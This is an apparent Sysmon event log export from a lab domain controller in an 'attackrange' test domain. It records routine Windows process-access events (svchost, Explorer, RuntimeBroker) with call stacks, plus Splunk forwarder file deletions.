12:02:32.739{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000007374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.552{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.552{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.552{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.380{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15B058FAB55CAC0AF30D5735C48C3888,SHA256=1F77C03549314F37F0FAC7BAD79F0D2940DAC822A51EA7B0D47B99447D2FE57B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.100{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=525B8C20864DB8CA989D16BF09BDEFA5,SHA256=B0A746C05F99570712C96E7222F08D4039525766E3B0915348FCD276B36ED268,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000007365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.038{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.038{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
